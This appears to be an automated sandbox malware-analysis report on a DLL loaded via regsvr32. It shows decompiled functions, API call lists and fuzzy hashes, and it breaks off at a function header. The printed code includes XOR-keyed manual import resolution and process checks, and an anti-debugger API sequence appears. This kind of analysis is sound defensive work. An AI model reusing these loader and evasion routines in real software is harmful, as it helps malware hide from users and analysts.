                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Heap$CreateDestroy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3296620671-0
                                                                                                                                                                                    • Opcode ID: 5760d410185d5c873c0790f6af209f10cbd8fa8c7d5af86d54b46dc950e2030a
                                                                                                                                                                                    • Instruction ID: beb549ca7e95a92dd35cc8f4edeeb023cb29215777787c697c5041e5d2eabe7e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5760d410185d5c873c0790f6af209f10cbd8fa8c7d5af86d54b46dc950e2030a
                                                                                                                                                                                    • Instruction Fuzzy Hash: EDE06DB1B10301EAEB517F36BD14B393A98F744647F10447DF494C9094E7B89840AA14
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 452 4d71c12-4d71c35 call 4d71112 455 4d71c37-4d71c3a 452->455 456 4d71c89-4d71c8e 452->456 457 4d71c53 455->457 458 4d71c3c-4d71c51 call 4d71bcb 455->458 460 4d71c55-4d71c57 457->460 458->460 462 4d71c59-4d71c71 call 4d71566 StrStrIA 460->462 463 4d71c78-4d71c83 HeapFree 460->463 462->463 466 4d71c73 462->466 463->456 466->463
                                                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                                                    			E04D71C12(void* __ecx) {
                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                    				signed short _t15;
                                                                                                                                                                                    				char* _t18;
                                                                                                                                                                                    				char* _t25;
                                                                                                                                                                                    				char* _t29;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t22 = __ecx;
                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                    				_t25 = 0;
                                                                                                                                                                                    				if(E04D71112( &_v8,  &_v12,  *0x4d741cc ^ 0x196db149) != 0) {
                                                                                                                                                                                    					if(_v8 == 0) {
                                                                                                                                                                                    						_t29 = 0;
                                                                                                                                                                                    					} else {
                                                                                                                                                                                    						_t29 = E04D71BCB(_t22, _v8,  *0x4d741cc ^ 0x6e49bbff);
                                                                                                                                                                                    					}
                                                                                                                                                                                    					if(_t29 != 0) {
                                                                                                                                                                                    						_t15 = E04D71566(_t22); // executed
                                                                                                                                                                                    						_v12 = _t15 & 0x0000ffff;
                                                                                                                                                                                    						_t18 = StrStrIA(_t29,  &_v12); // executed
                                                                                                                                                                                    						if(_t18 != 0) {
                                                                                                                                                                                    							_t25 = 0x657;
                                                                                                                                                                                    						}
                                                                                                                                                                                    					}
                                                                                                                                                                                    					HeapFree( *0x4d74190, 0, _v8);
                                                                                                                                                                                    				}
                                                                                                                                                                                    				return _t25;
                                                                                                                                                                                    			}









                                                                                                                                                                                    0x04d71c12
                                                                                                                                                                                    0x04d71c15
                                                                                                                                                                                    0x04d71c16
                                                                                                                                                                                    0x04d71c2c
                                                                                                                                                                                    0x04d71c35
                                                                                                                                                                                    0x04d71c3a
                                                                                                                                                                                    0x04d71c53
                                                                                                                                                                                    0x04d71c3c
                                                                                                                                                                                    0x04d71c4f
                                                                                                                                                                                    0x04d71c4f
                                                                                                                                                                                    0x04d71c57
                                                                                                                                                                                    0x04d71c59
                                                                                                                                                                                    0x04d71c61
                                                                                                                                                                                    0x04d71c69
                                                                                                                                                                                    0x04d71c71
                                                                                                                                                                                    0x04d71c73
                                                                                                                                                                                    0x04d71c73
                                                                                                                                                                                    0x04d71c71
                                                                                                                                                                                    0x04d71c83
                                                                                                                                                                                    0x04d71c83
                                                                                                                                                                                    0x04d71c8e

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • StrStrIA.KERNELBASE(00000000,04D71810,?,04D71810,?,00000000,00000000,?,?,?,04D71810), ref: 04D71C69
                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,04D71810,?,00000000,00000000,?,?,?,04D71810), ref: 04D71C83
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477268692.0000000004D71000.00000020.00020000.sdmp, Offset: 04D70000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.477251556.0000000004D70000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477283650.0000000004D73000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477296193.0000000004D75000.00000004.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477312335.0000000004D76000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d70000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                    • Opcode ID: 83f0f5b3c5813b3e5a1305baae87cf0e99ecec30402c9b5530aacf7d007b974f
                                                                                                                                                                                    • Instruction ID: b31563640bea50c606a29b59938b99d2321701df8ab7ddfd7bcfa776b39ca68b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 83f0f5b3c5813b3e5a1305baae87cf0e99ecec30402c9b5530aacf7d007b974f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 50014F76A00124ABDB119EE5DD41E9FBBFDEB84680F140362EA01E7344F635EE0097B0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ___getlocaleinfo
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1937885557-0
                                                                                                                                                                                    • Opcode ID: f85050cfc3fa4117e2ddb9e1b8cd0f5b27e7051b377b55f43499e3c466b91e9e
                                                                                                                                                                                    • Instruction ID: c823a62b2efeace73b44df1fcc76d38728ceb7229a1f3e807493fe1a7a625a5a
                                                                                                                                                                                    • Opcode Fuzzy Hash: f85050cfc3fa4117e2ddb9e1b8cd0f5b27e7051b377b55f43499e3c466b91e9e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9CE19CB390020DBEFF12DBB18C84EFF77BDEB14748F04096AA259D2050EA75EA159760
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ___getlocaleinfo.LIBCMT ref: 04D8D8C6
                                                                                                                                                                                      • Part of subcall function 04D966E4: ___crtGetLocaleInfoA.LIBCMT ref: 04D9672A
                                                                                                                                                                                      • Part of subcall function 04D966E4: GetLastError.KERNEL32(?,?,?,?,?,00000001), ref: 04D96738
                                                                                                                                                                                      • Part of subcall function 04D966E4: ___crtGetLocaleInfoA.LIBCMT ref: 04D9674F
                                                                                                                                                                                      • Part of subcall function 04D966E4: __calloc_crt.LIBCMT ref: 04D96763
                                                                                                                                                                                      • Part of subcall function 04D966E4: ___crtGetLocaleInfoA.LIBCMT ref: 04D96781
                                                                                                                                                                                      • Part of subcall function 04D966E4: __calloc_crt.LIBCMT ref: 04D96792
                                                                                                                                                                                    • __malloc_crt.LIBCMT ref: 04D8D8D8
                                                                                                                                                                                    • __calloc_crt.LIBCMT ref: 04D8D8E8
                                                                                                                                                                                    • __calloc_crt.LIBCMT ref: 04D8D8F3
                                                                                                                                                                                    • __calloc_crt.LIBCMT ref: 04D8D8FE
                                                                                                                                                                                    • __calloc_crt.LIBCMT ref: 04D8D90D
                                                                                                                                                                                    • GetCPInfo.KERNEL32(?,?), ref: 04D8D960
                                                                                                                                                                                    • ___crtGetStringTypeA.LIBCMT ref: 04D8D9CD
                                                                                                                                                                                    • ___crtLCMapStringA.LIBCMT ref: 04D8DA00
                                                                                                                                                                                    • ___crtLCMapStringA.LIBCMT ref: 04D8DA2D
                                                                                                                                                                                      • Part of subcall function 04D9CB4E: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 04D9CB5A
                                                                                                                                                                                      • Part of subcall function 04D9CB4E: __crtLCMapStringA_stat.LIBCMT ref: 04D9CB7A
                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 04D8DAFF
                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(04DE4190), ref: 04D8DBC7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ___crt__calloc_crt$Locale$InfoString$DecrementInterlocked$A_statErrorLastTypeUpdateUpdate::____getlocaleinfo__crt__malloc_crt
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2672922395-0
                                                                                                                                                                                    • Opcode ID: 246fd6946708696804ae2df83d69809506d17178a5a245e8ed6f57a678717724
                                                                                                                                                                                    • Instruction ID: 25202be19870e5bfb998fb8d9dcf413a7d3cb33f3356a0638fb37f064aeb22a9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 246fd6946708696804ae2df83d69809506d17178a5a245e8ed6f57a678717724
                                                                                                                                                                                    • Instruction Fuzzy Hash: 01B159B1E04245AEEB10EFA4C894BFEBBF5FF49304F14446DE485A7290E675B845CB20
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 04D8B4E5
                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04D8B4FA
                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(04DDE580), ref: 04D8B505
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 04D8B521
                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 04D8B528
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2579439406-0
                                                                                                                                                                                    • Opcode ID: 1459bf2641c471dcf6af2b94b7fffe5c9e107708090513e0d9b20c528715ef8f
                                                                                                                                                                                    • Instruction ID: 7609c55958ab60e6229e0c710fd6cf44e845674a473934ddb9ce18f52bcf605e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1459bf2641c471dcf6af2b94b7fffe5c9e107708090513e0d9b20c528715ef8f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C21CEB8901204DFDB10EF67E088A543BA5FB08306F51902EF5088F749E7BD6D888F55
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                    			E04D7146C() {
                                                                                                                                                                                    				void* _t1;
                                                                                                                                                                                    				long _t3;
                                                                                                                                                                                    				void* _t4;
                                                                                                                                                                                    				long _t5;
                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                    				intOrPtr _t8;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t8 =  *0x4d741b0;
                                                                                                                                                                                    				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                    				 *0x4d741bc = _t1;
                                                                                                                                                                                    				if(_t1 == 0) {
                                                                                                                                                                                    					return GetLastError();
                                                                                                                                                                                    				}
                                                                                                                                                                                    				_t3 = GetVersion();
                                                                                                                                                                                    				if(_t3 <= 5) {
                                                                                                                                                                                    					_t4 = 0x32;
                                                                                                                                                                                    					return _t4;
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					 *0x4d741ac = _t3;
                                                                                                                                                                                    					_t5 = GetCurrentProcessId();
                                                                                                                                                                                    					 *0x4d741a8 = _t5;
                                                                                                                                                                                    					 *0x4d741b0 = _t8;
                                                                                                                                                                                    					_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                                                                                    					 *0x4d741a4 = _t6;
                                                                                                                                                                                    					if(_t6 == 0) {
                                                                                                                                                                                    						 *0x4d741a4 =  *0x4d741a4 | 0xffffffff;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					return 0;
                                                                                                                                                                                    				}
                                                                                                                                                                                    			}









                                                                                                                                                                                    0x04d7146d
                                                                                                                                                                                    0x04d7147b
                                                                                                                                                                                    0x04d71483
                                                                                                                                                                                    0x04d71488
                                                                                                                                                                                    0x04d714d2
                                                                                                                                                                                    0x04d714d2
                                                                                                                                                                                    0x04d7148a
                                                                                                                                                                                    0x04d71492
                                                                                                                                                                                    0x04d714ce
                                                                                                                                                                                    0x04d714d0
                                                                                                                                                                                    0x04d71494
                                                                                                                                                                                    0x04d71494
                                                                                                                                                                                    0x04d71499
                                                                                                                                                                                    0x04d714a7
                                                                                                                                                                                    0x04d714ac
                                                                                                                                                                                    0x04d714b2
                                                                                                                                                                                    0x04d714ba
                                                                                                                                                                                    0x04d714bf
                                                                                                                                                                                    0x04d714c1
                                                                                                                                                                                    0x04d714c1
                                                                                                                                                                                    0x04d714cb
                                                                                                                                                                                    0x04d714cb

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,04D717B8,74B063F0,00000000), ref: 04D7147B
                                                                                                                                                                                    • GetVersion.KERNEL32 ref: 04D7148A
                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 04D71499
                                                                                                                                                                                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04D714B2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477268692.0000000004D71000.00000020.00020000.sdmp, Offset: 04D70000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.477251556.0000000004D70000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477283650.0000000004D73000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477296193.0000000004D75000.00000004.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477312335.0000000004D76000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d70000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 845504543-0
                                                                                                                                                                                    • Opcode ID: 8f9d0717140b598255b8832dbe4fe7c56bce6fea493ab56fa3e20aae8bbb4fa6
                                                                                                                                                                                    • Instruction ID: ebb886c650d063483376f5a21f475caded03006452db8156db449560ef44166d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f9d0717140b598255b8832dbe4fe7c56bce6fea493ab56fa3e20aae8bbb4fa6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 05F06730785230AFE722AF68B829B893BE0F704B91F10012AFA05C93C0F7B85840DB04
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                    			E04D71F31(void* __edi, intOrPtr _a4) {
                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                    				intOrPtr* _v12;
                                                                                                                                                                                    				_Unknown_base(*)()** _v16;
                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                    				signed short _v24;
                                                                                                                                                                                    				struct HINSTANCE__* _v28;
                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                    				intOrPtr* _t45;
                                                                                                                                                                                    				intOrPtr _t46;
                                                                                                                                                                                    				struct HINSTANCE__* _t47;
                                                                                                                                                                                    				intOrPtr* _t49;
                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                    				signed short _t51;
                                                                                                                                                                                    				_Unknown_base(*)()* _t53;
                                                                                                                                                                                    				CHAR* _t54;
                                                                                                                                                                                    				_Unknown_base(*)()* _t55;
                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                    				signed int _t59;
                                                                                                                                                                                    				_Unknown_base(*)()* _t60;
                                                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                                                    				intOrPtr _t65;
                                                                                                                                                                                    				signed int _t68;
                                                                                                                                                                                    				void* _t69;
                                                                                                                                                                                    				CHAR* _t71;
                                                                                                                                                                                    				signed short* _t73;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t69 = __edi;
                                                                                                                                                                                    				_v20 = _v20 & 0x00000000;
                                                                                                                                                                                    				_t59 =  *0x4d741cc;
                                                                                                                                                                                    				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
                                                                                                                                                                                    				if(_t43 != 0) {
                                                                                                                                                                                    					_t45 = _t43 + __edi;
                                                                                                                                                                                    					_v12 = _t45;
                                                                                                                                                                                    					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                                                                                                                                                                    					if(_t46 != 0) {
                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                    							_t71 = _t46 + _t69;
                                                                                                                                                                                    							_t47 = LoadLibraryA(_t71);
                                                                                                                                                                                    							_v28 = _t47;
                                                                                                                                                                                    							if(_t47 == 0) {
                                                                                                                                                                                    								break;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_v24 = _v24 & 0x00000000;
                                                                                                                                                                                    							 *_t71 = _t59 - 0x63699bc3;
                                                                                                                                                                                    							_t49 = _v12;
                                                                                                                                                                                    							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                                                                                                                                                                    							_t50 =  *_t49;
                                                                                                                                                                                    							if(_t50 != 0) {
                                                                                                                                                                                    								L6:
                                                                                                                                                                                    								_t73 = _t50 + _t69;
                                                                                                                                                                                    								_v16 = _t61 + _t69;
                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                    									_t51 =  *_t73;
                                                                                                                                                                                    									if(_t51 == 0) {
                                                                                                                                                                                    										break;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									if(__eflags < 0) {
                                                                                                                                                                                    										__eflags = _t51 - _t69;
                                                                                                                                                                                    										if(_t51 < _t69) {
                                                                                                                                                                                    											L12:
                                                                                                                                                                                    											_t21 =  &_v8;
                                                                                                                                                                                    											 *_t21 = _v8 & 0x00000000;
                                                                                                                                                                                    											__eflags =  *_t21;
                                                                                                                                                                                    											_v24 =  *_t73 & 0x0000ffff;
                                                                                                                                                                                    										} else {
                                                                                                                                                                                    											_t65 = _a4;
                                                                                                                                                                                    											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                                                                                                                                                                    											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                                                                                                                                                                    												goto L12;
                                                                                                                                                                                    											} else {
                                                                                                                                                                                    												goto L11;
                                                                                                                                                                                    											}
                                                                                                                                                                                    										}
                                                                                                                                                                                    									} else {
                                                                                                                                                                                    										_t51 = _t51 + _t69;
                                                                                                                                                                                    										L11:
                                                                                                                                                                                    										_v8 = _t51;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									_t53 = _v8;
                                                                                                                                                                                    									__eflags = _t53;
                                                                                                                                                                                    									if(_t53 == 0) {
                                                                                                                                                                                    										_t54 = _v24 & 0x0000ffff;
                                                                                                                                                                                    									} else {
                                                                                                                                                                                    										_t54 = _t53 + 2;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									_t55 = GetProcAddress(_v28, _t54);
                                                                                                                                                                                    									__eflags = _t55;
                                                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                                                    										_v20 = _t59 - 0x63699b44;
                                                                                                                                                                                    									} else {
                                                                                                                                                                                    										_t68 = _v8;
                                                                                                                                                                                    										__eflags = _t68;
                                                                                                                                                                                    										if(_t68 != 0) {
                                                                                                                                                                                    											 *_t68 = _t59 - 0x63699bc3;
                                                                                                                                                                                    										}
                                                                                                                                                                                    										 *_v16 = _t55;
                                                                                                                                                                                    										_t58 = 0x725990f8 + _t59 * 4;
                                                                                                                                                                                    										_t73 = _t73 + _t58;
                                                                                                                                                                                    										_t32 =  &_v16;
                                                                                                                                                                                    										 *_t32 = _v16 + _t58;
                                                                                                                                                                                    										__eflags =  *_t32;
                                                                                                                                                                                    										continue;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                    								}
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								_t50 = _t61;
                                                                                                                                                                                    								if(_t61 != 0) {
                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                    								}
                                                                                                                                                                                    							}
                                                                                                                                                                                    							L23:
                                                                                                                                                                                    							_v12 = _v12 + 0x14;
                                                                                                                                                                                    							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                                                                                    							if(_t46 != 0) {
                                                                                                                                                                                    								continue;
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    							}
                                                                                                                                                                                    							L26:
                                                                                                                                                                                    							goto L27;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_t60 = _t59 + 0x9c9664bb;
                                                                                                                                                                                    						__eflags = _t60;
                                                                                                                                                                                    						_v20 = _t60;
                                                                                                                                                                                    						goto L26;
                                                                                                                                                                                    					}
                                                                                                                                                                                    				}
                                                                                                                                                                                    				L27:
                                                                                                                                                                                    				return _v20;
                                                                                                                                                                                    			}




























                                                                                                                                                                                    0x04d71f31
                                                                                                                                                                                    0x04d71f3a
                                                                                                                                                                                    0x04d71f3f
                                                                                                                                                                                    0x04d71f45
                                                                                                                                                                                    0x04d71f4e
                                                                                                                                                                                    0x04d71f54
                                                                                                                                                                                    0x04d71f56
                                                                                                                                                                                    0x04d71f59
                                                                                                                                                                                    0x04d71f5e
                                                                                                                                                                                    0x04d71f65
                                                                                                                                                                                    0x04d71f65
                                                                                                                                                                                    0x04d71f69
                                                                                                                                                                                    0x04d71f71
                                                                                                                                                                                    0x04d71f74
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d71f7a
                                                                                                                                                                                    0x04d71f84
                                                                                                                                                                                    0x04d71f86
                                                                                                                                                                                    0x04d71f89
                                                                                                                                                                                    0x04d71f8c
                                                                                                                                                                                    0x04d71f90
                                                                                                                                                                                    0x04d71f98
                                                                                                                                                                                    0x04d71f9a
                                                                                                                                                                                    0x04d71f9d
                                                                                                                                                                                    0x04d72005
                                                                                                                                                                                    0x04d72005
                                                                                                                                                                                    0x04d72009
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d71fa2
                                                                                                                                                                                    0x04d71fa8
                                                                                                                                                                                    0x04d71faa
                                                                                                                                                                                    0x04d71fbd
                                                                                                                                                                                    0x04d71fc0
                                                                                                                                                                                    0x04d71fc0
                                                                                                                                                                                    0x04d71fc0
                                                                                                                                                                                    0x04d71fc4
                                                                                                                                                                                    0x04d71fac
                                                                                                                                                                                    0x04d71fac
                                                                                                                                                                                    0x04d71fb4
                                                                                                                                                                                    0x04d71fb6
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d71fb6
                                                                                                                                                                                    0x04d71fa4
                                                                                                                                                                                    0x04d71fa4
                                                                                                                                                                                    0x04d71fb8
                                                                                                                                                                                    0x04d71fb8
                                                                                                                                                                                    0x04d71fb8
                                                                                                                                                                                    0x04d71fc7
                                                                                                                                                                                    0x04d71fca
                                                                                                                                                                                    0x04d71fcc
                                                                                                                                                                                    0x04d71fd3
                                                                                                                                                                                    0x04d71fce
                                                                                                                                                                                    0x04d71fce
                                                                                                                                                                                    0x04d71fce
                                                                                                                                                                                    0x04d71fdb
                                                                                                                                                                                    0x04d71fe1
                                                                                                                                                                                    0x04d71fe3
                                                                                                                                                                                    0x04d72013
                                                                                                                                                                                    0x04d71fe5
                                                                                                                                                                                    0x04d71fe5
                                                                                                                                                                                    0x04d71fe8
                                                                                                                                                                                    0x04d71fea
                                                                                                                                                                                    0x04d71ff2
                                                                                                                                                                                    0x04d71ff2
                                                                                                                                                                                    0x04d71ff7
                                                                                                                                                                                    0x04d71ff9
                                                                                                                                                                                    0x04d72000
                                                                                                                                                                                    0x04d72002
                                                                                                                                                                                    0x04d72002
                                                                                                                                                                                    0x04d72002
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d72002
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d71fe3
                                                                                                                                                                                    0x04d71f92
                                                                                                                                                                                    0x04d71f94
                                                                                                                                                                                    0x04d71f96
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d71f96
                                                                                                                                                                                    0x04d72016
                                                                                                                                                                                    0x04d72016
                                                                                                                                                                                    0x04d7201d
                                                                                                                                                                                    0x04d72022
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d72028
                                                                                                                                                                                    0x04d72033
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d72033
                                                                                                                                                                                    0x04d7202a
                                                                                                                                                                                    0x04d7202a
                                                                                                                                                                                    0x04d72030
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d72030
                                                                                                                                                                                    0x04d71f5e
                                                                                                                                                                                    0x04d72034
                                                                                                                                                                                    0x04d72039

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 04D71F69
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 04D71FDB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477268692.0000000004D71000.00000020.00020000.sdmp, Offset: 04D70000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.477251556.0000000004D70000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477283650.0000000004D73000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477296193.0000000004D75000.00000004.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477312335.0000000004D76000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d70000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2574300362-0
                                                                                                                                                                                    • Opcode ID: 23cbb7fcd5cf3a4aa84ae766ef38eefd595b232c7a22d7a3788518a57bbba8ab
                                                                                                                                                                                    • Instruction ID: f980f8f2ff4b686f5b6d9597a15418ac2fdb398c2343c676efcc888b9bb83a58
                                                                                                                                                                                    • Opcode Fuzzy Hash: 23cbb7fcd5cf3a4aa84ae766ef38eefd595b232c7a22d7a3788518a57bbba8ab
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A31E572B0020A9FDB24CF69C881AAEB7F4FF44355B1445AAE951E7340F774EA40DB61
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __decode_pointer.LIBCMT ref: 04D8CC91
                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04D8CC98
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled__decode_pointer
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3341406909-0
                                                                                                                                                                                    • Opcode ID: 256498fad8dd293f0897c2d7e8146ec3c5da94e749d569338862c0a9c39ce158
                                                                                                                                                                                    • Instruction ID: 0b8ff90c762177cb4262a9c9bfd39b6c4ec6198abd1039df5ae5b5d61abb7110
                                                                                                                                                                                    • Opcode Fuzzy Hash: 256498fad8dd293f0897c2d7e8146ec3c5da94e749d569338862c0a9c39ce158
                                                                                                                                                                                    • Instruction Fuzzy Hash: F5C08C808082800FF7016736648D32C3A04EB0100AF9018ADD040C4242D6DCA44BC129
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                    			E04D72485(long _a4) {
